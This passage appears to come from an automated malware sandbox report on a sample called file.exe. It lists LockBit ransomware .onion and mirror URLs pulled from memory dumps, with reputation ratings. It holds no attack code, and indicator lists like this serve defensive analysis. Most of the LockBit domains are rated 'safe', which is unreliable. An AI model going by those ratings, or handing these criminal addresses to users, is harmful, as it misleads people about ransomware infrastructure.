00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.lyfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.442393956.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.439820474.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitapt.uzfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitsupp.uzfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.442393956.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.439820474.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://tox.chat/download.html.file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.442393956.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.439820474.000000000092F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.lyfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.lyfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.lyfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.lyfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://lockbitsupp.uzFFFFFFFFFFFFFFFFFFFFFfile.exe, 00000000.00000002.516606433.0000000000720000.00000004.00000001.00040000.00000009.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.lyfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onionFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFfile.exe, 00000000.00000002.516606433.0000000000720000.00000004.00000001.00040000.00000009.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 